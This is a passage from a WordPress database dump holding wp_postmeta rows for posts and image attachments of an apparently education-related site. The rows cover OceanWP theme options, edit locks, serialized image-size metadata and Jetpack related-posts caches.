4371237:42'),(25086,3738,'_last_editor_used_jetpack','block-editor'),(25091,3738,'_wp_old_date','2021-06-22'),(25093,3738,'_edit_last','42'),(25094,3738,'ocean_gallery_link_images','off'),(25095,3738,'ocean_sidebar','0'),(25096,3738,'ocean_second_sidebar','0'),(25097,3738,'ocean_disable_margins','enable'),(25098,3738,'ocean_display_top_bar','default'),(25099,3738,'ocean_display_header','default'),(25100,3738,'ocean_center_header_left_menu','0'),(25101,3738,'ocean_custom_header_template','0'),(25102,3738,'ocean_header_custom_menu','0'),(25103,3738,'ocean_menu_typo_font_family','0'),(25104,3738,'ocean_disable_title','default'),(25105,3738,'ocean_disable_heading','default'),(25106,3738,'ocean_disable_breadcrumbs','default'),(25107,3738,'ocean_display_footer_widgets','default'),(25108,3738,'ocean_display_footer_bottom','default'),(25109,3738,'ocean_custom_footer_template','0'),(25110,3738,'ocean_link_format_target','self'),(25111,3738,'ocean_quote_format_link','post'),(25112,3738,'osh_disable_topbar_sticky','default'),(25113,3738,'osh_disable_header_sticky','default'),(25114,3738,'osh_sticky_header_style','default'),(25115,3741,'_wp_attached_file','2021/05/youth-summit.png'),(25116,3741,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:24:\"2021/05/youth-summit.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"youth-summit-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"youth-summit-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"youth-summit-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25119,3738,'_thumbnail_id','3741'),(25120,3742,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628523945;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3738;}i:1;a:1:{s:2:\"id\";i:3479;}i:2;a:1:{s:2:\"id\";i:3060;}}}}'),(25121,3742,'_edit_lock','1624371847:42'),(25122,3742,'_last_editor_used_jetpack','block-editor'),(25123,3743,'_wp_attached_file','2021/06/world-environment-day.png'),(25124,3743,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:33:\"2021/06/world-environment-day.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"world-environment-day-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"world-environment-day-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"world-environment-day-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25127,3742,'_wp_old_date','2021-06-22'),(25128,3742,'_thumbnail_id','3743'),(25129,3742,'_edit_last','42'),(25130,3742,'ocean_gallery_link_images','off'),(25131,3742,'ocean_sidebar','0'),(25132,3742,'ocean_second_sidebar','0'),(25133,3742,'ocean_disable_margins','enable'),(25134,3742,'ocean_display_top_bar','default'),(25135,3742,'ocean_display_header','default'),(25136,3742,'ocean_center_header_left_menu','0'),(25137,3742,'ocean_custom_header_template','0'),(25138,3742,'ocean_header_custom_menu','0'),(25139,3742,'ocean_menu_typo_font_family','0'),(25140,3742,'ocean_disable_title','default'),(25141,3742,'ocean_disable_heading','default'),(25142,3742,'ocean_disable_breadcrumbs','default'),(25143,3742,'ocean_display_footer_widgets','default'),(25144,3742,'ocean_display_footer_bottom','default'),(25145,3742,'ocean_custom_footer_template','0'),(25146,3742,'ocean_link_format_target','self'),(25147,3742,'ocean_quote_format_link','post'),(25148,3742,'osh_disable_topbar_sticky','default'),(25149,3742,'osh_disable_header_sticky','default'),(25150,3742,'osh_sticky_header_style','default'),(25153,3746,'_jetpack_related_posts_cache','a:2:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628182594;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2801;}i:1;a:1:{s:2:\"id\";i:3069;}i:2;a:1:{s:2:\"id\";i:3127;}}}s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1628198665;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:2801;}i:1;a:1:{s:2:\"id\";i:3069;}i:2;a:1:{s:2:\"id\";i:3127;}i:3;a:1:{s:2:\"id\";i:3489;}i:4;a:1:{s:2:\"id\";i:3060;}i:5;a:1:{s:2:\"id\";i:3749;}}}}'),(25154,3746,'_edit_lock','1624372076:42'),(25155,3746,'_last_editor_used_jetpack','block-editor'),(25156,3747,'_wp_attached_file','2021/06/computers.png'),(25157,3747,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:21:\"2021/06/computers.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"computers-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"computers-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"computers-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25160,3746,'_wp_old_date','2021-06-22'),(25161,3746,'_thumbnail_id','3747'),(25162,3746,'_edit_last','42'),(25163,3746,'ocean_gallery_link_images','off'),(25164,3746,'ocean_sidebar','0'),(25165,3746,'ocean_second_sidebar','0'),(25166,3746,'ocean_disable_margins','enable'),(25167,3746,'ocean_display_top_bar','default'),(25168,3746,'ocean_display_header','default'),(25169,3746,'ocean_center_header_left_menu','0'),(25170,3746,'ocean_custom_header_template','0'),(25171,3746,'ocean_header_custom_menu','0'),(25172,3746,'ocean_menu_typo_font_family','0'),(25173,3746,'ocean_disable_title','default'),(25174,3746,'ocean_disable_heading','default'),(25175,3746,'ocean_disable_breadcrumbs','default'),(25176,3746,'ocean_display_footer_widgets','default'),(25177,3746,'ocean_display_footer_bottom','default'),(25178,3746,'ocean_custom_footer_template','0'),(25179,3746,'ocean_link_format_target','self'),(25180,3746,'ocean_quote_format_link','post'),(25181,3746,'osh_disable_topbar_sticky','default'),(25182,3746,'osh_disable_header_sticky','default'),(25183,3746,'osh_sticky_header_style','default'),(25184,3749,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1627923844;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3124;}i:1;a:1:{s:2:\"id\";i:2801;}i:2;a:1:{s:2:\"id\";i:3117;}}}}'),(25185,3749,'_edit_lock','1624372572:42'),(25186,3749,'_last_editor_used_jetpack','block-editor'),(25187,3750,'_wp_attached_file','2021/06/teacher-training.png'),(25188,3750,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:28:\"2021/06/teacher-training.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"teacher-training-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"teacher-training-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"teacher-training-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25191,3749,'_wp_old_date','2021-06-22'),(25192,3749,'_thumbnail_id','3750'),(25193,3749,'_edit_last','42'),(25194,3749,'ocean_gallery_link_images','off'),(25195,3749,'ocean_sidebar','0'),(25196,3749,'ocean_second_sidebar','0'),(25197,3749,'ocean_disable_margins','enable'),(25198,3749,'ocean_display_top_bar','default'),(25199,3749,'ocean_display_header','default'),(25200,3749,'ocean_center_header_left_menu','0'),(25201,3749,'ocean_custom_header_template','0'),(25202,3749,'ocean_header_custom_menu','0'),(25203,3749,'ocean_menu_typo_font_family','0'),(25204,3749,'ocean_disable_title','default'),(25205,3749,'ocean_disable_heading','default'),(25206,3749,'ocean_disable_breadcrumbs','default'),(25207,3749,'ocean_display_footer_widgets','default'),(25208,3749,'ocean_display_footer_bottom','default'),(25209,3749,'ocean_custom_footer_template','0'),(25210,3749,'ocean_link_format_target','self'),(25211,3749,'ocean_quote_format_link','post'),(25212,3749,'osh_disable_topbar_sticky','default'),(25213,3749,'osh_disable_header_sticky','default'),(25214,3749,'osh_sticky_header_style','default'),(25215,3752,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628526413;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3066;}i:1;a:1:{s:2:\"id\";i:3027;}i:2;a:1:{s:2:\"id\";i:3069;}}}}'),(25216,3752,'_edit_lock','1624373208:42'),(25217,3752,'_last_editor_used_jetpack','block-editor'),(25218,3753,'_wp_attached_file','2021/06/assessment.png'),(25219,3753,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:22:\"2021/06/assessment.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"assessment-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"assessment-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"assessment-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25222,3752,'_thumbnail_id','3753'),(25223,3752,'_edit_last','42'),(25224,3752,'ocean_gallery_link_images','off'),(25225,3752,'ocean_sidebar','0'),(25226,3752,'ocean_second_sidebar','0'),(25227,3752,'ocean_disable_margins','enable'),(25228,3752,'ocean_display_top_bar','default'),(25229,3752,'ocean_display_header','default'),(25230,3752,'ocean_center_header_left_menu','0'),(25231,3752,'ocean_custom_header_template','0'),(25232,3752,'ocean_header_custom_menu','0'),(25233,3752,'ocean_menu_typo_font_family','0'),(25234,3752,'ocean_disable_title','default'),(25235,3752,'ocean_disable_heading','default'),(25236,3752,'ocean_disable_breadcrumbs','default'),(25237,3752,'ocean_display_footer_widgets','default'),(25238,3752,'ocean_display_footer_bottom','default'),(25239,3752,'ocean_custom_footer_template','0'),(25240,3752,'ocean_link_format_target','self'),(25241,3752,'ocean_quote_format_link','post'),(25242,3752,'osh_disable_topbar_sticky','default'),(25243,3752,'osh_disable_header_sticky','default'),(25244,3752,'osh_sticky_header_style','default'),(25245,2035,'_wp_attachment_custom_header_last_used_oceanwp','1625686389'),(25246,2035,'_wp_attachment_is_custom_header','oceanwp'),(25247,258,'_wp_attachment_custom_header_last_used_oceanwp','1625686428'),(25248,258,'_wp_attachment_is_custom_header','oceanwp'),(25252,2038,'_wp_attachment_custom_header_last_used_oceanwp','1625748222'),(25253,2038,'_wp_attachment_is_custom_header','oceanwp'),(25260,3764,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628975773;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3038;}i:1;a:1:{s:2:\"id\";i:3781;}i:2;a:1:{s:2:\"id\";i:3738;}}}}'),(25261,3764,'_edit_lock','1626172524:42'),(25262,3764,'_last_editor_used_jetpack','block-editor'),(25263,3765,'_wp_attached_file','2021/07/image.png'),(25264,3765,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:601;s:6:\"height\";i:329;s:4:\"file\";s:17:\"2021/07/image.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"image-300x164.png\";s:5:\"width\";i:300;s:6:\"height\";i:164;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"image-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25265,3766,'_wp_attached_file','2021/07/image-1.png'),(25266,3766,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:601;s:6:\"height\";i:278;s:4:\"file\";s:19:\"2021/07/image-1.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"image-1-300x139.png\";s:5:\"width\";i:300;s:6:\"height\";i:139;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"image-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25267,3767,'_wp_attached_file','2021/07/image-2.png'),(25268,3767,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:601;s:6:\"height\";i:278;s:4:\"file\";s:19:\"2021/07/image-2.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"image-2-300x139.png\";s:5:\"width\";i:300;s:6:\"height\";i:139;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"image-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25270,3769,'_wp_attached_file','2021/07/Emergi.jpg.png'),(25271,3769,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:22:\"2021/07/Emergi.jpg.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Emergi.jpg-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Emergi.jpg-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Emergi.jpg-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25274,3764,'_thumbnail_id','3769'),(25275,3764,'_edit_last','42'),(25276,3764,'ocean_gallery_link_images','off'),(25277,3764,'ocean_sidebar','0'),(25278,3764,'ocean_second_sidebar','0'),(25279,3764,'ocean_disable_margins','enable'),(25280,3764,'ocean_display_top_bar','default'),(25281,3764,'ocean_display_header','default'),(25282,3764,'ocean_center_header_left_menu','0'),(25283,3764,'ocean_custom_header_template','0'),(25284,3764,'ocean_header_custom_menu','0'),(25285,3764,'ocean_menu_typo_font_family','0'),(25286,3764,'ocean_disable_title','default'),(25287,3764,'ocean_disable_heading','default'),(25288,3764,'ocean_disable_breadcrumbs','default'),(25289,3764,'ocean_display_footer_widgets','default'),(25290,3764,'ocean_display_footer_bottom','default'),(25291,3764,'ocean_custom_footer_template','0'),(25292,3764,'ocean_link_format_target','self'),(25293,3764,'ocean_quote_format_link','post'),(25294,3764,'osh_disable_topbar_sticky','default'),(25295,3764,'osh_disable_header_sticky','default'),(25296,3764,'osh_sticky_header_style','default'),(25297,3771,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628744285;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3290;}i:1;a:1:{s:2:\"id\";i:3752;}i:2;a:1:{s:2:\"id\";i:3735;}}}}'),(25298,3771,'_edit_lock','1626203249:42'),(25299,3771,'_last_editor_used_jetpack','block-editor'),(25300,3772,'_wp_attached_file','2021/07/libassa.png'),(25301,3772,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:19:\"2021/07/libassa.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"libassa-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"libassa-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"libassa-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25304,3771,'_thumbnail_id','3772'),(25305,3771,'_edit_last','42'),(25306,3771,'ocean_gallery_link_images','off'),(25307,3771,'ocean_sidebar','0'),(25308,3771,'ocean_second_sidebar','0'),(25309,3771,'ocean_disable_margins','enable'),(25310,3771,'ocean_display_top_bar','default'),(25311,3771,'ocean_display_header','default'),(25312,3771,'ocean_center_header_left_menu','0'),(25313,3771,'ocean_custom_header_template','0'),(25314,3771,'ocean_header_custom_menu','0'),(25315,3771,'ocean_menu_typo_font_family','0'),(25316,3771,'ocean_disable_title','default'),(25317,3771,'ocean_disable_heading','default'),(25318,3771,'ocean_disable_breadcrumbs','default'),(25319,3771,'ocean_display_footer_widgets','default'),(25320,3771,'ocean_display_footer_bottom','default'),(25321,3771,'ocean_custom_footer_template','0'),(25322,3771,'ocean_link_format_target','self'),(25323,3771,'ocean_quote_format_link','post'),(25324,3771,'osh_disable_topbar_sticky','default'),(25325,3771,'osh_disable_header_sticky','default'),(25326,3771,'osh_sticky_header_style','default'),(25327,3774,'_jetpack_related_posts_cache','a:2:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628188162;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3777;}i:1;a:1:{s:2:\"id\";i:3038;}i:2;a:1:{s:2:\"id\";i:3710;}}}s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1628198666;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:3777;}i:1;a:1:{s:2:\"id\";i:3038;}i:2;a:1:{s:2:\"id\";i:3710;}i:3;a:1:{s:2:\"id\";i:3738;}i:4;a:1:{s:2:\"id\";i:3498;}i:5;a:1:{s:2:\"id\";i:3430;}}}}'),(25328,3774,'_edit_lock','1626203675:42'),(25329,3774,'_last_editor_used_jetpack','block-editor'),(25330,3775,'_wp_attached_file','2021/07/nafaa.png'),(25331,3775,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2021/07/nafaa.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"nafaa-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"nafaa-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"nafaa-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25334,3774,'_wp_old_date','2021-07-13'),(25335,3774,'_thumbnail_id','3775'),(25336,3774,'_edit_last','42'),(25337,3774,'ocean_gallery_link_images','off'),(25338,3774,'ocean_sidebar','0'),(25339,3774,'ocean_second_sidebar','0'),(25340,3774,'ocean_disable_margins','enable'),(25341,3774,'ocean_display_top_bar','default'),(25342,3774,'ocean_display_header','default'),(25343,3774,'ocean_center_header_left_menu','0'),(25344,3774,'ocean_custom_header_template','0'),(25345,3774,'ocean_header_custom_menu','0'),(25346,3774,'ocean_menu_typo_font_family','0'),(25347,3774,'ocean_disable_title','default'),(25348,3774,'ocean_disable_heading','default'),(25349,3774,'ocean_disable_breadcrumbs','default'),(25350,3774,'ocean_display_footer_widgets','default'),(25351,3774,'ocean_display_footer_bottom','default'),(25352,3774,'ocean_custom_footer_template','0'),(25353,3774,'ocean_link_format_target','self'),(25354,3774,'ocean_quote_format_link','post'),(25355,3774,'osh_disable_topbar_sticky','default'),(25356,3774,'osh_disable_header_sticky','default'),(25357,3774,'osh_sticky_header_style','default'),(25358,3777,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1629020467;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3774;}i:1;a:1:{s:2:\"id\";i:3038;}i:2;a:1:{s:2:\"id\";i:3063;}}}}'),(25359,3777,'_edit_lock','1626211454:42'),(25360,3777,'_last_editor_used_jetpack','block-editor'),(25361,3778,'_wp_attached_file','2021/07/Untitled.png'),(25362,3778,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:20:\"2021/07/Untitled.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Untitled-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Untitled-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Untitled-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25365,3777,'_wp_old_date','2021-07-13'),(25366,3777,'_thumbnail_id','3778'),(25367,3777,'_edit_last','42'),(25368,3777,'ocean_gallery_link_images','off'),(25369,3777,'ocean_sidebar','0'),(25370,3777,'ocean_second_sidebar','0'),(25371,3777,'ocean_disable_margins','enable'),(25372,3777,'ocean_display_top_bar','default'),(25373,3777,'ocean_display_header','default'),(25374,3777,'ocean_center_header_left_menu','0'),(25375,3777,'ocean_custom_header_template','0'),(25376,3777,'ocean_header_custom_menu','0'),(25377,3777,'ocean_menu_typo_font_family','0'),(25378,3777,'ocean_disable_title','default'),(25379,3777,'ocean_disable_heading','default'),(25380,3777,'ocean_disable_breadcrumbs','default'),(25381,3777,'ocean_display_footer_widgets','default'),(25382,3777,'ocean_display_footer_bottom','default'),(25383,3777,'ocean_custom_footer_template','0'),(25384,3777,'ocean_link_format_target','self'),(25385,3777,'ocean_quote_format_link','post'),(25386,3777,'osh_disable_topbar_sticky','default'),(25387,3777,'osh_disable_header_sticky','default'),(25388,3777,'osh_sticky_header_style','default'),(25389,3781,'_jetpack_related_posts_cache','a:3:{s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1628942538;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:3764;}i:1;a:1:{s:2:\"id\";i:3038;}i:2;a:1:{s:2:\"id\";i:2813